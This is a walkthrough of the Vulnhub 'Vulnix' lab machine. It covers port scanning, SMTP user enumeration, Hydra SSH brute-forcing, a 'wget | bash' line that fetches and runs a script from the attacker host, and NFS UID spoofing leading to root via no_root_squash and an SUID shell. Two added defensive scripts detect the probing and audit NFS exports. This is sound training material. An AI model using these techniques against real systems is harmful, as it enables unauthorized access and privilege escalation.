Vulnhub Vulnix
22 March, 2021
Machine Link: https://www.vulnhub.com/entry/hacklab-vulnix,48/
Beginning with an nmap scan. That's a lot of ports... Looks like it's a mail server.
$ sudo nmap -A -p 1-20000 192.168.56.112
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.56.112
Host is up (0.00068s latency).
Not shown: 19988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL RESP-CODES STLS CAPA SASL TOP
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33279/udp mountd
| 100005 1,2,3 42338/tcp6 mountd
| 100005 1,2,3 42726/udp6 mountd
| 100005 1,2,3 46563/tcp mountd
| 100021 1,3,4 37137/udp nlockmgr
| 100021 1,3,4 37553/tcp6 nlockmgr
| 100021 1,3,4 40311/tcp nlockmgr
| 100021 1,3,4 53741/udp6 nlockmgr
| 100024 1 38901/udp6 status
| 100024 1 40388/udp status
| 100024 1 59400/tcp6 status
| 100024 1 60658/tcp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities LOGIN-REFERRALS more IDLE have post-login OK IMAP4rev1 ID SASL-IR listed LITERAL+ STARTTLS LOGINDISABLEDA0001 ENABLE Pre-login
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-03-22T22:33:38+00:00; +5h29m59s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 08:00:27:71:3F:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5h29m58s, deviation: 0s, median: 5h29m58s
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.56.112
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.64 seconds
Let's begin with port 25, running smtpd.
$ nmap -p25 --script smtp-commands 192.168.56.112
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 10:35 EDT
Nmap scan report for 192.168.56.112
Host is up (0.018s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
Nmap done: 1 IP address (1 host up) scanned in 17.82 seconds
Using smtp-user-enum in VRFY mode with a username wordlist to enumerate valid local users:
$ /usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /media/sf_Projects/HTB/wordlists/usernames.txt -t 192.168.56.112
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /media/sf_Projects/HTB/wordlists/usernames.txt
Target count ............. 1
Username count ........... 86771
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Mar 23 10:48:44 2021 #########
192.168.56.112: backup exists
192.168.56.112: bin exists
192.168.56.112: daemon exists
192.168.56.112: landscape exists
192.168.56.112: list exists
192.168.56.112: lp exists
192.168.56.112: mail exists
192.168.56.112: man exists
192.168.56.112: news exists
192.168.56.112: nobody exists
192.168.56.112: postfix exists
192.168.56.112: postmaster exists
192.168.56.112: proxy exists
192.168.56.112: root exists
192.168.56.112: sync exists
192.168.56.112: user exists
######## Scan completed at Tue Mar 23 10:53:37 2021 #########
19 results.
86771 queries in 293 seconds (296.1 queries / sec)
I also checked manually for the user vulnix, and yes, it looks like it exists (252 for a known user, 550 for an unknown one):
$ telnet 192.168.56.112 25
Trying 192.168.56.112...
Connected to 192.168.56.112.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
VRFY vulnix
252 2.0.0 vulnix
VRFY lkansd
550 5.1.1 <lkansd>: Recipient address rejected: User unknown in local recipient table
Moving on to the next port: finger is running on port 79. It doesn't give much information apart from confirming that the users are present.
$ finger root@192.168.56.112
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
$ finger vulnix@192.168.56.112
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Reading about the rest of the open ports, I realised not a lot could be done without a set of credentials, so next I checked out the NFS share.
$ mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock
mount.nfs: failed to apply fstab options
$ sudo mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock
[sudo] password for kali:
$ cd vulnix
cd: permission denied: vulnix
# cd vulnix
cd: permission denied: vulnix
# ls -ltrha
total 332K
drwxr-x--- 2 nobody 4294967294 4.0K Sep 2 2012 vulnix
Probably due to some misconfiguration on the server, the NFS share mounted but I couldn't enter it: the directory is mode drwxr-x--- and its owner shows up as nobody/4294967294 on my machine, so my local user has no permission on it. On reading more, I found that the server honours the UID presented by the client, so the user on the client machine must have the same UID as the one allowed to access the folder on the server. At this point I thought of going back to SSH and brute forcing the password for vulnix using rockyou.txt.
$ hydra -l vulnix -P /media/sf_Projects/HTB/wordlists/rockyou.txt 192.168.56.112 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-23 12:05:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 34.00 tries/min, 102 tries in 00:03h, 14344297 to do in 7031:32h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.53 tries/min, 428 tries in 00:15h, 14343971 to do in 8378:30h, 4 active
Well, that was taking a lot of time, so I tried the user "user" instead.
$ hydra -l user -P /media/sf_Projects/HTB/wordlists/rockyou.txt 192.168.56.112 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-23 12:32:10
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 32.33 tries/min, 97 tries in 00:03h, 14344302 to do in 7393:59h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.27 tries/min, 424 tries in 00:15h, 14343975 to do in 8457:32h, 4 active
[22][ssh] host: 192.168.56.112 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-23 12:51:03
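Both the VRFY probing earlier and the SSH password guessing above leave an obvious trail on the server. The following is an added example, not from the original post: it runs over constructed Postfix and sshd log lines, counts rejected VRFYs and failed passwords per source address, and flags a password login from a source that was already failing. The log line formats and the thresholds are assumptions.

```python
"""Flag SMTP VRFY user enumeration and SSH password guessing in syslog-style log lines."""
import re
from collections import Counter

# Constructed sample log lines (Postfix / sshd syslog style); not captured from the box.
_VRFY = ("Mar 23 10:48:{s:02d} vulnix postfix/smtpd[1201]: NOQUEUE: reject: VRFY from "
         "unknown[192.168.56.103]: 550 5.1.1 <{u}>: Recipient address rejected: "
         "User unknown in local recipient table; to=<{u}> proto=SMTP helo=<kali>")
SAMPLE_LOG = [_VRFY.format(s=i, u=u)
              for i, u in enumerate(["lkansd", "admin", "test", "guest", "oracle", "git"])]
SAMPLE_LOG += [
    "Mar 23 12:05:10 vulnix sshd[1320]: Failed password for vulnix from 192.168.56.103 port 40122 ssh2",
    "Mar 23 12:05:12 vulnix sshd[1322]: Failed password for invalid user admin from 192.168.56.103 port 40124 ssh2",
    "Mar 23 12:05:14 vulnix sshd[1324]: Failed password for user from 192.168.56.103 port 40126 ssh2",
    "Mar 23 12:51:03 vulnix sshd[1400]: Accepted password for user from 192.168.56.103 port 40300 ssh2",
    "Mar 23 13:00:00 vulnix sshd[1500]: Accepted publickey for user from 192.168.56.1 port 50000 ssh2",
]

VRFY_RE = re.compile(r"postfix/smtpd\[\d+\]: NOQUEUE: reject: VRFY from \S+\[(?P<ip>[\d.]+)\]")
SSH_FAIL_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
SSH_OK_RE = re.compile(r"sshd\[\d+\]: Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+)")


def triage(lines, vrfy_threshold=5, ssh_threshold=3):
    """Return per-source findings: VRFY probing, password guessing, and a guess run ending in success."""
    vrfy_rejects, ssh_failures = Counter(), Counter()
    guess_then_success = []
    for line in lines:
        if m := VRFY_RE.search(line):
            vrfy_rejects[m["ip"]] += 1          # one rejected VRFY = one probed username
        elif m := SSH_FAIL_RE.search(line):
            ssh_failures[m["ip"]] += 1          # any user, including "invalid user" guesses
        elif m := SSH_OK_RE.search(line):
            # a password login from a source that was already failing is the first thing to look at
            if ssh_failures[m["ip"]] >= ssh_threshold:
                guess_then_success.append((m["ip"], m["user"]))
    return {
        "vrfy_probing": {ip: n for ip, n in vrfy_rejects.items() if n >= vrfy_threshold},
        "ssh_guessing": {ip: n for ip, n in ssh_failures.items() if n >= ssh_threshold},
        "guess_then_success": guess_then_success,
    }


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_LOG).items():
        print(kind, hits)
```

On the Postfix side the probing disappears entirely with disable_vrfy_command = yes in main.cf; the sshd side is what fail2ban-style rate limiting or key-only authentication addresses.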
OK, so now that I was in, I started exploring.
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
Unfortunately, I couldn't transfer linpeas because, apparently, there was no space left on the disk.
user@vulnix:~$ wget http://192.168.56.103:8000/linpeas.sh
--2021-03-23 22:24:20-- http://192.168.56.103:8000/linpeas.sh
Connecting to 192.168.56.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 320037 (313K) [text/x-sh]
Saving to: `linpeas.sh'
0% [ ] 0 --.-K/s in 0s
Cannot write to `linpeas.sh' (No space left on device).
But I could still run it by piping the output of wget directly into bash:
user@vulnix:~$ wget -O - http://192.168.56.103:8000/linpeas.sh | bash
Linpeas didn't show me anything useful, though, so I backtracked a bit and thought about the NFS permission blockade. Now that /etc/passwd has given me the UID of vulnix (2008), I can create a user with the same UID on my local machine and hopefully access the mounted folder properly this time around.
$ su vulnix
Password:
$ sudo mount -t nfs 192.168.56.112:/home/vulnix /home/kali/vulnix -o nolock
[sudo] password for vulnix:
$ cd /home/kali/vulnix
$ ls -ltrha
total 20K
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
-rw-r--r-- 1 vulnix vulnix 3.5K Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
drwxr-x--- 2 vulnix vulnix 4.0K Sep 2 2012 .
drwxr-xr-x 20 kali kali 4.0K Mar 23 13:24 ..
So I created an SSH key, but when I tried to add it to /home/vulnix/.ssh/authorized_keys I kept getting "no space left on device". Apparently this was a recurring issue with this box, and I couldn't find a way to get around it.
To follow the rest of the path, I'd suggest reading abatchy's post. In short: vulnix is allowed to sudoedit /etc/exports and can disable root_squash for /home/vulnix. root_squash is defined as follows:
root_squash prevents remote root users from having superuser (root) privileges on remote NFS-mounted volumes. no_root_squash allows the root user on the NFS client host to access the NFS-mounted directory with the same rights and privileges that the superuser would normally have.
With that in place, you can cd into the mount as root from the attack machine after mounting it. Then you transfer bash (or your favourite shell) into it and run it as root after setting the SUID bit.
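The whole NFS leg of this box rests on two export settings: the server honouring client-supplied UIDs (why a local user with UID 2008 could enter the share) and no_root_squash. The script below is an added example, not part of the original post or of abatchy's: it parses a constructed /etc/exports with the weak line beside a tightened one and flags the options that would allow either. The option names are the standard exports(5) ones; the sample client host is made up.

```python
"""Audit /etc/exports for the settings that make NFS trust whatever the client says about itself."""
import re

# Constructed sample: the weak export beside a tightened form (not the box's real /etc/exports).
SAMPLE_EXPORTS = """\
# weak: any host, client-chosen UIDs honoured, remote root stays root
/home/vulnix *(rw,no_root_squash)
# tightened: one client, read-only, every client UID mapped to nobody, privileged source ports only
/home/vulnix 192.168.56.1(ro,root_squash,all_squash,secure)
"""

ENTRY_RE = re.compile(r"^(?P<path>\S+)\s*(?P<clients>.*)$")
CLIENT_RE = re.compile(r"(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text):
    """Yield (path, host, options) for every client entry; a missing host means 'everyone'."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = ENTRY_RE.match(line)
        for c in CLIENT_RE.finditer(m["clients"]):
            if c["host"] or c["opts"]:        # finditer also yields empty matches; skip them
                yield m["path"], c["host"] or "*", set(filter(None, (c["opts"] or "").split(",")))


def audit_exports(text):
    """Return (path, host, issue) findings; an empty list means nothing was flagged."""
    findings = []
    for path, host, opts in parse_exports(text):
        if host == "*" or host.startswith("*."):
            findings.append((path, host, "export reachable from any host"))
        if "no_root_squash" in opts:
            findings.append((path, host, "remote root keeps root on the export"))
        if "insecure" in opts:
            findings.append((path, host, "unprivileged client source ports accepted"))
        if "all_squash" not in opts:
            # without all_squash the server honours the UID the client presents (AUTH_SYS),
            # which is exactly what creating a local user with UID 2008 relied on above
            findings.append((path, host, "client-supplied UIDs are honoured"))
        if "rw" in opts and host == "*":
            findings.append((path, host, "world-writable export"))
    return findings


if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {host}: {issue}")
```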